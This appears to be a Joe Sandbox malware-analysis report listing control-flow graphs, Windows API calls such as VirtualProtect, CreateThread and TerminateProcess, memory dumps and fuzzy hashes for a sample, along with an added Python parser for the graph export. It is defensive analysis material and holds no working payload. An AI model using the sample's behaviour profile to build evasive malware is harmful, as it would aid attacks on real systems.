control_flow_graph 138 ef52d0-ef5304 139 ef530e-ef5318 138->139 140 ef531e-ef536b 139->140 141 ef5370-ef537a 139->141 140->139 142 ef5384-ef538e 141->142 143 ef5394-ef53fb call ec10e0 142->143 144 ef5400-ef5414 142->144 143->142 146 ef541e-ef5427 144->146 148 ef542d-ef5431 146->148 149 ef55b6-ef55c8 call ec8eaa 146->149 151 ef5437-ef5481 KiUserExceptionDispatcher 148->151 152 ef5556-ef55b1 148->152 154 ef550e-ef5551 call ec10e0 151->154 155 ef5487-ef54a0 call ed520c 151->155 152->146 154->152 159 ef54d6-ef54fd GetLastError call ec14e0 call ec1470 155->159 160 ef54a6-ef54c9 call ec1110 call ec1470 155->160 169 ef5500-ef5509 call ed4c7a 159->169 167 ef54ce-ef54d1 160->167 167->169 169->154
APIs
• KiUserExceptionDispatcher.NTDLL ref: 00EF5450
• GetLastError.KERNEL32 ref: 00EF54D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: DispatcherErrorExceptionLastUser
• String ID: [+]
• API String ID: 2542788420-4228040803
• Opcode ID: a5e5547a70808ddcd899f23e387936c75c10648dde6429f60cb739ecdbe36187
• Instruction ID: 9ddf7eba73f5d4cd3b76f11925dc3fe99e14ba3122dbe5b9982fd4fc8bfb387c
• Opcode Fuzzy Hash: a5e5547a70808ddcd899f23e387936c75c10648dde6429f60cb739ecdbe36187
• Instruction Fuzzy Hash: CA7139B594922D8BCB24EF58D9987E9BBF0AF68304F1040E9E88DA7341D6749AC4CF51

Control-flow Graph

APIs
• FreeConsole.KERNELBASE ref: 00EF56CA
  • Part of subcall function 00EF52D0: KiUserExceptionDispatcher.NTDLL ref: 00EF5450
  • Part of subcall function 00EF52D0: GetLastError.KERNEL32 ref: 00EF54D6
• VirtualProtect.KERNELBASE ref: 00EF577A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ConsoleDispatcherErrorExceptionFreeLastProtectUserVirtual
• String ID: @
• API String ID: 1907986952-2766056989
• Opcode ID: ccdbf4af372b87122300cf3963f5f31e4bcec2b93cffcc3dc875fbb14b12e67a
• Instruction ID: 300c1f8c95627cc130e82f8fb998f17f88a0724b2a374734be6d80720793e908
• Opcode Fuzzy Hash: ccdbf4af372b87122300cf3963f5f31e4bcec2b93cffcc3dc875fbb14b12e67a
• Instruction Fuzzy Hash: C541CDB0D01208DFDB04EFA9D5856AEBBF0FF88314F508529E558AB350D775A944CF91

Control-flow Graph

control_flow_graph 187 ed1131-ed113c 188 ed113e-ed1151 call ed34c5 call ed3bb0 187->188 189 ed1152-ed1165 call ed11c2 187->189 194 ed1167-ed1184 CreateThread 189->194 195 ed1193 189->195 198 ed1186-ed1192 GetLastError call ed34eb 194->198 199 ed11a2-ed11a7 194->199 200 ed1195-ed11a1 call ed1212 195->200 198->195 203 ed11ae-ed11b2 199->203 204 ed11a9-ed11ac 199->204 203->200 204->203
APIs
• CreateThread.KERNELBASE(?,?,Function_00011249,00000000,?,?), ref: 00ED117A
• GetLastError.KERNEL32(?,00000000,00000000,?,00EC87F7), ref: 00ED1186
• __dosmaperr.LIBCMT ref: 00ED118D
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 44df55100dfb214d82d492578adabc3d1231c33a4aad3c2d7860a7f4106d69ff
• Instruction ID: 15d17d865fe7a27227eefd9e2332150632780fc961273576f10100421bd93183
• Opcode Fuzzy Hash: 44df55100dfb214d82d492578adabc3d1231c33a4aad3c2d7860a7f4106d69ff
• Instruction Fuzzy Hash: E2018C32501209BFDF159FB1CC06AAE7BA9EF40364F10509AF911B6250DB71CE42EB90

Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 207 edf738-edf78d call ecc0a0 210 edf78f 207->210 211 edf802-edf812 call ec8eaa 207->211 213 edf795 210->213 215 edf79b-edf79d 213->215 216 edf79f-edf7a4 215->216 217 edf7b7-edf7dc WriteFile 215->217 218 edf7ad-edf7b5 216->218 219 edf7a6-edf7ac 216->219 220 edf7de-edf7e9 217->220 221 edf7fa-edf800 GetLastError 217->221 218->215 218->217 219->218 220->211 222 edf7eb-edf7f6 220->222 221->211 222->213 223 edf7f8 222->223 223->211
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00EDF0CA,00000000,00ED458F,?,00000000,?,00000000), ref: 00EDF7D4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00EDF0CA,00000000,00ED458F,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00ED434B), ref: 00EDF7FA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6a7d488dceb0892bf31ec2110c07b8d90b1cdf22da62a8c5f687135b0dcb0a9c
                                                                                                                                                                                                                                                                  • Instruction ID: 27717e434f57ddb2ff8f8949f227483ec5691be54bb9961af20ae7f9e5faffe2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a7d488dceb0892bf31ec2110c07b8d90b1cdf22da62a8c5f687135b0dcb0a9c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33218D35A002199FCB19CF29DD809E9B7F9EB88305F2440BAE90AE7351D7309E47CB60

Control-flow Graph (block id, address range, API called in the block, successor blocks; the executed/not-executed colouring of the rendered graph is not carried in the text)
• 224  ed8e82-ed8e87                -> 225
• 225  ed8e89-ed8ea1                -> 226, 227
• 226  ed8eaf-ed8eb8                -> 228, 229
• 227  ed8ea3-ed8ea7                -> 226, 230
• 228  ed8eca                       -> 234
• 229  ed8eba-ed8ebd                -> 232, 233
• 230  ed8ea9-ed8ead                -> 231
• 231  ed8f24-ed8f28                -> 225, 237
• 232  ed8ebf-ed8ec4                -> 234
• 233  ed8ec6-ed8ec8                -> 234
• 234  ed8ecc-ed8ed9  GetStdHandle  -> 235, 236
• 235  ed8edb-ed8edd                -> 236, 238
• 236  ed8f06-ed8f18                -> 231, 239
• 237  ed8f2e-ed8f31                -> (no successors)
• 238  ed8edf-ed8ee8  GetFileType   -> 236, 240
• 239  ed8f1a-ed8f1d                -> 231
• 240  ed8eea-ed8ef3                -> 241, 242
• 241  ed8efb-ed8efe                -> 231, 243
• 242  ed8ef5-ed8ef9                -> 231
• 243  ed8f00-ed8f04                -> 231
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00ED8D71,00EF1A10), ref: 00ED8ECE
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00ED8D71,00EF1A10), ref: 00ED8EE0
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 2970f508abfb9c1585d6c0dac45bed00b2201913e7bcc20a2f31277573333c0a
• Instruction ID: 423498bb7228f15443690f1f2a19a304a082e1b68601f427b268b990dc92dacc
• Opcode Fuzzy Hash: 2970f508abfb9c1585d6c0dac45bed00b2201913e7bcc20a2f31277573333c0a
• Instruction Fuzzy Hash: B111B4716047414AC7344B3E8E88622BB95DB92338B38271BE8B6F67F1CB74D987D644
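
The two control-flow graphs above (the functions at edf738 and ed8e82) are exported by Joe Sandbox as a flat token stream: block entries `<id> <start>[-<end>]`, optionally followed by `call <addr>` or the name of the imported API the block calls, interleaved with `<a>-><b>` edges. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that stream, lists the blocks that call an imported API, gives the shortest block path from the entry block to each of them, and finds loop back-edges. The two graph strings are copied from this section; the grammar is inferred from them and is an assumption, as are the names `Block`, `parse_cfg`, `api_blocks`, `shortest_path` and `back_edges`.

```python
"""Parse the flat control_flow_graph export of a Joe Sandbox execution-graph section. Added example, not
part of the report or its tooling; the token grammar is inferred from this page's two graphs (assumption)."""
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Graphs of the functions at edf738 and ed8e82, copied verbatim from this report section.
CFG_WRITE = (
    "control_flow_graph 207 edf738-edf78d call ecc0a0 210 edf78f 211 edf802-edf812 call ec8eaa "
    "207->210 207->211 213 edf795 210->213 215 edf79b-edf79d 213->215 216 edf79f-edf7a4 215->216 "
    "217 edf7b7-edf7dc WriteFile 215->217 218 edf7ad-edf7b5 216->218 219 edf7a6-edf7ac 216->219 "
    "220 edf7de-edf7e9 217->220 221 edf7fa-edf800 GetLastError 217->221 218->215 218->217 219->218 "
    "220->211 222 edf7eb-edf7f6 220->222 221->211 222->213 223 edf7f8 222->223 223->211"
)
CFG_STDIO = (
    "control_flow_graph 224 ed8e82-ed8e87 225 ed8e89-ed8ea1 224->225 226 ed8eaf-ed8eb8 225->226 "
    "227 ed8ea3-ed8ea7 225->227 228 ed8eca 226->228 229 ed8eba-ed8ebd 226->229 227->226 "
    "230 ed8ea9-ed8ead 227->230 234 ed8ecc-ed8ed9 GetStdHandle 228->234 232 ed8ebf-ed8ec4 229->232 "
    "233 ed8ec6-ed8ec8 229->233 231 ed8f24-ed8f28 230->231 231->225 237 ed8f2e-ed8f31 231->237 "
    "232->234 233->234 235 ed8edb-ed8edd 234->235 236 ed8f06-ed8f18 234->236 235->236 "
    "238 ed8edf-ed8ee8 GetFileType 235->238 236->231 239 ed8f1a-ed8f1d 236->239 238->236 "
    "240 ed8eea-ed8ef3 238->240 239->231 241 ed8efb-ed8efe 240->241 242 ed8ef5-ed8ef9 240->242 "
    "241->231 243 ed8f00-ed8f04 241->243 242->231 243->231"
)

@dataclass
class Block:
    bid: int
    start: str                     # hex addresses exactly as printed in the report
    end: str
    label: Optional[str] = None    # "call <addr>" (intra-module) or an imported API name
    succ: List[int] = field(default_factory=list)

def parse_cfg(text: str) -> Dict[int, Block]:
    """Token stream -> {block_id: Block} in listing order; edges may precede their nodes."""
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph export")
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                   # edge  a->b
            a, b = tok.split("->")
            edges.append((int(a), int(b)))
            i += 1
        elif tok.isdigit():                               # node  id addr[-addr] [label]
            start, _, end = tokens[i + 1].partition("-")
            blk = Block(int(tok), start, end or start)
            i += 2
            if i < len(tokens) and tokens[i] == "call":   # subroutine inside the module
                blk.label = "call " + tokens[i + 1]
                i += 2
            elif i < len(tokens) and tokens[i][0].isalpha():  # imported API name
                blk.label = tokens[i]
                i += 1
            blocks[blk.bid] = blk
        else:
            raise ValueError("unexpected token %r" % tok)
    for a, b in edges:
        blocks[a].succ.append(b)
    return blocks

def api_blocks(blocks: Dict[int, Block]) -> Dict[int, str]:
    """Blocks that call an imported API (label present and not a 'call <addr>')."""
    return {b.bid: b.label for b in blocks.values() if b.label and not b.label.startswith("call ")}

def shortest_path(blocks: Dict[int, Block], src: int, dst: int) -> Optional[List[int]]:
    """BFS over successor edges: block-id path from src to dst, or None if unreachable."""
    prev: Dict[int, Optional[int]] = {src: None}
    queue = deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path: List[int] = []
            while cur is not None:
                path.append(cur)
                cur = prev[cur]
            return path[::-1]
        for nxt in blocks[cur].succ:
            if nxt not in prev:
                prev[nxt] = cur
                queue.append(nxt)
    return None

def back_edges(blocks: Dict[int, Block], entry: int) -> List[Tuple[int, int]]:
    """Loop-closing edges: DFS edges that point at a block still on the DFS stack."""
    found, on_stack, done = [], set(), set()
    def visit(b: int) -> None:
        on_stack.add(b)
        for s in blocks[b].succ:
            if s in on_stack:
                found.append((b, s))
            elif s not in done:
                visit(s)
        on_stack.discard(b)
        done.add(b)
    visit(entry)
    return found
```

Calling `parse_cfg(CFG_WRITE)` and then `api_blocks`, `shortest_path` and `back_edges` with the first listed block (207) as entry gives WriteFile at block 217 reached via 207, 210, 213, 215, 217, GetLastError at block 221 as a direct successor of the WriteFile block, and two back-edges (218->215 and 222->213), so the write sits inside a loop; for `CFG_STDIO` the single back-edge 231->225 shows GetStdHandle and GetFileType being called from a loop. The executed/not-executed colouring of the rendered graph is not present in the text export, so block coverage cannot be recovered this way.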

Control-flow Graph
APIs
• GetModuleHandleA.KERNEL32 ref: 00EF5B38
• GetModuleFileNameA.KERNEL32 ref: 00EF5B58
  • Part of subcall function 00EC1690: std::_Throw_Cpp_error.LIBCPMT ref: 00EC16BD
  • Part of subcall function 00EC1690: GetCurrentThreadId.KERNEL32 ref: 00EC16CB
  • Part of subcall function 00EC1690: std::_Throw_Cpp_error.LIBCPMT ref: 00EC16E4
  • Part of subcall function 00EC1690: std::_Throw_Cpp_error.LIBCPMT ref: 00EC1723
Memory Dump Source
• Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$Module$CurrentFileHandleNameThread
• String ID:
• API String ID: 1246727395-0
• Opcode ID: f4c3f31f032bd81b608d0323866bf1574be82b83984b388a7a165b23271fc263
• Instruction ID: 4e3f1adef69a66dac408fa00a9b16e34837a9c1ca87984dfe385e02fa8882eb0
• Opcode Fuzzy Hash: f4c3f31f032bd81b608d0323866bf1574be82b83984b388a7a165b23271fc263
• Instruction Fuzzy Hash: 5F11DAB09042188FCB58EF78DA457EDBBF0AB48300F0045ADD589A7351EA749E88CF82

Control-flow Graph
APIs
• GetLastError.KERNEL32(00EF1540,0000000C), ref: 00ED125C
• ExitThread.KERNEL32 ref: 00ED1263
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID:
• API String ID: 1611280651-0
• Opcode ID: a40e00d274d96b1cb570209c03d496f967dcf7e4516396265daa78ba2c265190
• Instruction ID: 784a6c64d50d3f9e27cd5f33f27627c37822826e88f4ffb6f0a0dba592797b15
• Opcode Fuzzy Hash: a40e00d274d96b1cb570209c03d496f967dcf7e4516396265daa78ba2c265190
• Instruction Fuzzy Hash: AAF0AF70A40208AFDB04ABB0C90AE7E3BB5EF81750F10558AF401B73A2DB315902DBA1

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 279 ef5600-ef564d GetCurrentProcess TerminateProcess call ec8eaa 282 ef5652-ef5657 279->282
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00EF562C
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNELBASE ref: 00EF563F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2429186680-0
                                                                                                                                                                                                                                                                  • Opcode ID: d6c89b532d29e9b29bdb707e7dd716b53d9856c6317a58bd26b764276666d7bc
                                                                                                                                                                                                                                                                  • Instruction ID: 933b9541d158656e35c93e2de8074992dc83924d879bb1189704fecfe3a1d5ae
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6c89b532d29e9b29bdb707e7dd716b53d9856c6317a58bd26b764276666d7bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F0A031A012089FD748AF78E8596AE7BE4EFC8310F40803DE54EAB240EE349848C781

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 283 ed75d3-ed75e7 GetLastError 284 ed75e9-ed75f1 call ed7feb 283->284 285 ed7603-ed760d call ed802a 283->285 292 ed75fe 284->292 293 ed75f3-ed75fc 284->293 290 ed760f-ed7611 285->290 291 ed7613-ed761b call ed8700 285->291 294 ed7678-ed7681 SetLastError 290->294 296 ed7620-ed7626 291->296 292->285 293->294 297 ed7688-ed768d call ed411a 294->297 298 ed7683-ed7687 294->298 299 ed7639-ed7647 call ed802a 296->299 300 ed7628-ed7637 call ed802a 296->300 308 ed7649-ed7657 call ed802a 299->308 309 ed7660-ed7675 call ed78e4 call ed7347 299->309 307 ed7658-ed765e call ed7347 300->307 316 ed7677 307->316 308->307 309->316 316->294
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 397aad96417030441c34f325e5f028b812b55dee10fc4696346c85d11ac4129c
                                                                                                                                                                                                                                                                  • Instruction ID: cb20e772d9458ac540330d995bab52dae64cf5df2fbcd2fffa5c142c8ed1cf1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 397aad96417030441c34f325e5f028b812b55dee10fc4696346c85d11ac4129c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D11E33131DA116FA3202BB99D86E3A2288DF507A9B10212BF662B13A1FF91CC1B9550

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 319 eca10f-eca129 320 eca12b-eca12d 319->320 321 eca132-eca13a 319->321 322 eca20b-eca218 call ec8eaa 320->322 323 eca13c-eca146 321->323 324 eca15b-eca15f 321->324 323->324 331 eca148-eca159 323->331 327 eca165-eca176 call eca99f 324->327 328 eca207 324->328 335 eca17e-eca1b2 327->335 336 eca178-eca17c 327->336 330 eca20a 328->330 330->322 334 eca1d4-eca1d6 331->334 334->330 342 eca1d8-eca1e0 335->342 343 eca1b4-eca1b7 335->343 337 eca1c5 call ec9ac0 336->337 340 eca1ca-eca1d1 337->340 340->334 345 eca1f5-eca205 342->345 346 eca1e2-eca1f3 call ed4dca 342->346 343->342 344 eca1b9-eca1bd 343->344 344->328 348 eca1bf-eca1c2 344->348 345->330 346->328 346->345 348->337
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4763fbc1090eb783ba5978d41c5536b3f5aca7dd4288bce5d9ec584a2b02adae
